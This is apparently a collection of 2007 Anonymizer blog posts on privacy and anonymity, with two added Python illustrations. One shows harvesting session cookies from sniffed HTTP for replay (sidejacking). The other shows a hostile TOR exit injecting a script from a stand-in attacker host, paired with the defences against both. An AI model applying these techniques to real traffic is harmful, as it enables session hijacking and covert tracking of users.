Yahoo seeks to dismiss China case - Yahoo! News

This is a really interesting legal case. Yahoo was sued in the US on behalf of Chinese journalists who were convicted in China of violating Chinese law. Yahoo's involvement was to hand over evidence from its logs and stored account data to the Chinese authorities. The argument is that Yahoo should have resisted more and provided less information under US and international law.

The people working for Yahoo in China are in a tough place: they could easily be arrested and held in contempt for failing to comply. Widespread corruption in China would almost certainly lead to extra-legal consequences for Yahoo if it resisted.

One might well criticize Yahoo for designing its systems so that they retained the logs and account data needed to satisfy such foreseeable demands for information on journalists and dissidents. What is never stored cannot be handed over.

I think it is a mistake to trust such potentially damaging information to any company like Yahoo, Google, AOL, etc. International law will be a cold comfort if you are sitting in a jail somewhere. The only real solution is to take control of your own information. Use encryption and anonymity to ensure that your information cannot be handed over.

E-voting predicament: Not-so-secret ballots | CNET News.com

Once again it is shown that security and anonymity are not as simple as they look. In this case an e-voting system lets anyone recover the actual vote of every voter, by name. This eliminates any privacy in the voting process.

The implications for vote buying, and for retribution by family, employers and others, are huge.

The Trial of Fake Steve Jobs - how the anonymous author was identified

Here is an interesting bit of detective work. An anonymous blogger was uncovered through a combination of geographic location (pulled from IP addresses), characteristic writing patterns, and some shrewd guesswork. The tracking of the IP address is the first piece of evidence they mention. Now, if he had used Anonymizer...

Sidejacking

Report: "Sidejacking" session information over WiFi easy as pie

While this is not really news, it is a very nice description of a very widespread risk. The issue here is that many websites simply use a serial number in a cookie to keep track of user sessions. The implicit behavior is that if you have the cookie, you are authenticated and logged in. The big problem is that most of these sites also send that cookie over plain, unencrypted HTTP on every request. With the popularity of open WiFi networks, capturing those cookies has become very easy: anyone in radio range can record the traffic. Once an attacker has the cookie, he can replay it and act as you for all purposes on those websites, without ever learning your password.

The simplest solutions are: enable SSL on the website (if possible, and for the whole session rather than just the login page, with the session cookie marked Secure so the browser never sends it over plain HTTP), only use WPA-secured WiFi (which protects the wireless hop only; the traffic is still in the clear beyond the access point), use a VPN, or use Anonymizer with the encrypted surfing option enabled (which encrypts everything between your computer and Anonymizer, so the WiFi network sees only ciphertext, even for sites that do not offer SSL themselves).
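To make the mechanics concrete, here is an added Python example (not from the original post, and not from the report it links) that does what a sidejacking tool does on an open network: pull session-looking cookies out of captured plaintext HTTP requests, keyed by host. It then checks the one Set-Cookie attribute that actually closes the hole, because SSL on the login page alone is not enough: a cookie without the Secure attribute is still sent on any http:// link to the same site. The captured requests, hosts and cookie values are constructed for the example.

```python
"""Sidejacking illustration: what a passive listener on open WiFi can pull
out of plaintext HTTP, and the cookie attributes that stop it.
Added example; hosts and session values below are invented."""
import re
from urllib.parse import urlsplit

# Constructed capture: three HTTP requests as they would cross an open WiFi
# network in the clear.  The session identifiers are invented.
CAPTURED = [
    b"GET /inbox HTTP/1.1\r\nHost: mail.example.com\r\n"
    b"Cookie: sid=8f3c2a9d41e7; lang=en\r\nUser-Agent: x\r\n\r\n",
    b"POST /update HTTP/1.1\r\nHost: social.example.net\r\n"
    b"Cookie: PHPSESSID=d2a0b7c3e9f1; theme=dark\r\nContent-Length: 0\r\n\r\n",
    b"GET /logo.png HTTP/1.1\r\nHost: static.example.org\r\n\r\n",
]

# Heuristic used by the "attacker": any cookie whose name hints at a session.
SESSION_HINT = re.compile(r"(sess|sid|auth|token|login)", re.IGNORECASE)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (host, {cookie name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    host, cookies = None, {}
    for line in lines[1:]:            # skip the request line
        name, _, value = line.partition(":")
        if name.lower() == "host":
            host = value.strip()
        elif name.lower() == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    return host, cookies


def sidejack(captures):
    """Return {host: {cookie: value}} for every session-looking cookie seen
    in the clear.  Replaying these in a Cookie header is all it takes."""
    stolen = {}
    for raw in captures:
        host, cookies = parse_request(raw)
        hits = {k: v for k, v in cookies.items() if SESSION_HINT.search(k)}
        if host and hits:
            stolen.setdefault(host, {}).update(hits)
    return stolen


def audit_set_cookie(header_value):
    """Return the protections missing from a Set-Cookie header value.
    'Secure' is what defeats sidejacking: without it the browser still sends
    the cookie on any http:// request to the site, even after an SSL login.
    'HttpOnly' keeps script on the page from reading the cookie."""
    attrs = {p.strip().split("=")[0].lower()
             for p in header_value.split(";")[1:]}
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    return missing


def browser_will_send(set_cookie_header, url):
    """Would a browser attach this cookie to a request for `url`?"""
    scheme = urlsplit(url).scheme
    has_secure = "Secure" not in audit_set_cookie(set_cookie_header)
    return scheme == "https" or not has_secure


if __name__ == "__main__":
    print(sidejack(CAPTURED))
    weak = "sid=8f3c2a9d41e7; Path=/"
    hard = "sid=8f3c2a9d41e7; Path=/; Secure; HttpOnly"
    for c in (weak, hard):
        print(audit_set_cookie(c),
              browser_will_send(c, "http://mail.example.com/inbox"))
```

The point of `browser_will_send` is the check a site operator should run after "enabling SSL": if the session cookie lacks Secure, one stray http:// image or link on the site leaks it exactly as before.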

Testing if OPT-OUT really lets you OPT-OUT

I am posting this to help the World Privacy Forum test whether web advertisers actually honor their own opt-out systems. This should provide some very interesting hard data on the actual practices of the big online advertisers. They are running a test on the Opt Out page of the Network Advertising Initiative site and are looking for volunteers. The idea is to determine how well the opt-out page is working, for which advertisers and which browsers.

Here are the directions:

(To run this test, you will need to set your browser to accept cookies)

1. Open site: http://www.networkadvertising.org/managing/opt_out.asp

2. Check all of the opt out boxes you will see on the right hand column of the screen.

3. Click the submit button. (bottom of page)

4. Note how many of the opt outs were successful. (Successful opt outs will have a green check mark next to them; unsuccessful opt-outs will have a red X mark next to them.)

5. Please tell us your OS and OS version, and your browser and browser version. 

6. If you can, please send us a screen shot of your result page. 

7. Please email results to nai_test@nyms.net  

8. We are closing the test period on Thursday, July 26, at close of business (Pacific). 

Tor hack proposed to catch criminals

This article is a couple of months old now, but I have been thinking about it a lot. Basically, HD Moore has created a set of tools that scan the contents of traffic leaving a TOR exit node and inject active tracking code into the data returned to the user. While this is possible in any anonymity system (whoever operates the exit point sees, and can alter, any traffic that is not encrypted end to end), the fact that almost anyone can run a TOR node makes the question of trust much trickier.

I have talked to Roger Dingledine (one of the creators of TOR) about this but we seem to talk past each other. As I understand it, Roger feels that a user needs to take additional action to protect himself from such threats, including blocking all active content. He would further argue that if you are going to an insecure site, then you are putting yourself at risk. TOR is about anonymity, not security.
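As an added illustration (not HD Moore's tools and not TOR project code), the following Python models the exit-node attack described above and the two defences implied by Roger's position: encryption, which makes the traffic opaque to the exit, and blocking active content on the client, which discards whatever was injected. The hostile exit only rewrites plaintext HTML, inserts a script tag that the browser would fetch from the attacker's own server, and fixes up Content-Length so the tampered page still parses. The beacon host and the page content are invented for the example.

```python
"""Constructed model of a hostile TOR exit node and the two defences
against it.  Added example; the beacon host and page are invented."""
import re

BEACON = b"http://tracker.example.invalid/beacon.js"   # hypothetical attacker host


def build_response(body, content_type=b"text/html; charset=utf-8"):
    """Assemble a minimal HTTP/1.1 200 response with a correct Content-Length."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type +
            b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed plaintext page as the origin server would send it.
ORIGIN_HTML = build_response(
    b"<html><body><p>Hello from a plain http:// site.</p></body></html>")


def split_response(raw):
    """Return (status line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return status_line, headers, body


def hostile_exit(raw, over_tls):
    """What a malicious exit node can do.  TLS traffic is opaque to it, so it
    passes through untouched.  Plaintext HTML gets a <script> tag inserted
    that the browser will load from the attacker's server.
    Returns (bytes delivered to the user, whether anything was injected)."""
    if over_tls:
        return raw, False
    status_line, headers, body = split_response(raw)
    if not headers.get("content-type", "").startswith("text/html"):
        return raw, False                     # only HTML runs script
    tag = b'<script src="' + BEACON + b'"></script>'
    if b"</body>" in body:
        body = body.replace(b"</body>", tag + b"</body>", 1)
    else:
        body += tag
    # Content-Length must match the new body or the browser truncates it.
    headers["content-length"] = str(len(body))
    head = status_line + "\r\n" + "\r\n".join(
        f"{k}: {v}" for k, v in headers.items())   # header names are case-insensitive
    return head.encode("latin-1") + b"\r\n\r\n" + body, True


# Client-side mitigation: "block all active content" in practice.
ACTIVE_TAG = re.compile(rb"<(script|object|embed|applet)\b[^>]*>.*?</\1\s*>",
                        re.I | re.S)


def strip_active_content(body):
    """Drop script/object/embed/applet elements before rendering."""
    return ACTIVE_TAG.sub(b"", body)


def fetch_through_exit(raw, over_tls, block_active):
    """Run one response through the exit and the client's policy.
    Returns (body the browser renders, injected?, beacon reaches browser?)."""
    delivered, injected = hostile_exit(raw, over_tls)
    _, _, body = split_response(delivered)
    if block_active:
        body = strip_active_content(body)
    return body, injected, BEACON in body


if __name__ == "__main__":
    for tls, block in ((True, False), (False, False), (False, True)):
        body, injected, reaches = fetch_through_exit(ORIGIN_HTML, tls, block)
        print(f"tls={tls} block_active={block}: injected={injected} "
              f"beacon_reaches_browser={reaches}")
```

The model makes the disagreement visible: with both defences switched off, the injected script reaches the browser; with either one on, it does not. Whether ordinary users will keep either switched on is the question the rest of this post is about.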

While all this is true, it runs aground on the reefs of reality. I am reminded of a statement by Yogi Berra: "In theory there is no difference between theory and practice. In practice there is." People want active content. People want to go to insecure websites. People want privacy. People don't want to work for it.

At the end of the day, that is really the difference between the TOR philosophy and the Anonymizer philosophy. We think that users should not need to be security experts. We think they should not have to research the trustworthiness of a number of different individuals or groups. We think that the privacy threats normal people actually face in the real world are a long way from the unlimited money and resource attacks imagined by academic security researchers. Security is a balance. We strive to be secure, fast, and user friendly. I think 11 years without a single breach of a user's identity from using the service is good evidence that we are doing something right.

April 2, 2007 - Fortify Software Documents Pervasive and Critical Vulnerability in Web 2.0

It looks like, in addition to the privacy risks of voluntarily revealing information through Web 2.0 sites, weaknesses in the most common frameworks will let attackers gather even non-public data from these sites.

Web 2.0 generally refers to web sites that are either web applications or are based on community content. In either case they involve users uploading substantial amounts of possibly sensitive personal information to the sites. I predict that a great deal of damage may result from this in the long run.